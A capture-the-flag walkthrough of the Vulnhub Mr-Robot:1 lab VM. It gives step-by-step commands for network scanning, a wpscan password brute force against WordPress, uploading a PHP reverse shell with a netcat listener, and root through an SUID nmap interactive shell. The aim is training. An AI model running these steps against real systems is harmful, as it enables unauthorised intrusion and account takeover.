Vulnhub | Mr-Robot :1 CTF Walk through | OSCP Model

Mr-Robot CTF (Capture The Flag): 1 Walkthrough Summary:(OSCP Model)

https://twitter.com/AppSecJay
https://www.linkedin.com/in/jaganboda/

Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Step by step process:

Enumeration:
Step 1: So fire up the Kali VM, and the Mr-Robot:1 VM. I start by figuring out the IP address of the machine. Using below commands.
nmap 192.168.0.0/24 -Pn -T4
netdiscover -r 192.168.0.0/24

Step 2: Try to find directory and interesting files form below commands
nikto -h 192.168.48.150
dirb -h http://192.168.48.150

Step 3: Download files from below location analyse.
wget https://192.168.48.150/key-1-of-3.txt — 1st Key Flag
wget http://192.168.48.150/fsocity.dic
Useful commands. wc -l fsocity.dic <word count in fsocity>
cat fsocity.dic| sort -u | uniq > Newfsocity.dic

Step 4: Try to find username: try default credentials admin:admin .. Try with MR.Robot TV series Main character like elliot, Mr Robot,Angela, Darlene , Tyrell as User Name & Analyse what kind of error returns …

Gaining Access (Exploitation):

Step 5: To brute force the password and try the fsociety.dic I found
wpscan –url 192.168.48.150 –wordlist /root/Downloads/Newfsocity.dic –username elliot

Step 6: I make note and head over to the wordpress login to see what we can get!

Step 7: Upload the the PHP code(reverse shell payload) from Pentest Monkey, and execute it.
Note:Change IP Address and Port according to your lab set up.
useful payload link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Step 8: Start a netcat listener “nc -lvp 9999”

Step 9: Browse the payload updated page “http://192.168.48.150/404.php&#8221; (for my case)

Step 10: Once you get a shell find for 2nd Flag. under home directory. analyze all available files and try to get hint from those file.

Useful command “python -c “import pty;pty.spawn(‘/bin/bash’);” “
Running the above line imports bash and starts a new shell. From here I was able to run commands as normal.

Step 11: Try to decrypt password of robot user. use this website https://crackstation.net/.

Step 12: Change user as robot with cracked password from crackstation. Once you get 2nd Flag .

Privilege Escalation :

Step 13: Next we need to get in to the ROOT directory. Try to find interesting files files.
Useful command: find / -perm -4000 2>/dev/null
I also notice the system has nmap installed. This is listed under the SUID section of the Linux enum script.
Just google it “nmap privilege escalation”

Step 14: So I drop in to nmap interactive (nmap –interactive) mode and running the following commands. And with that we have our final key!
Useful command: nmap –interactive
!sh

Clean up:
Just Restart a victim machine for clean up.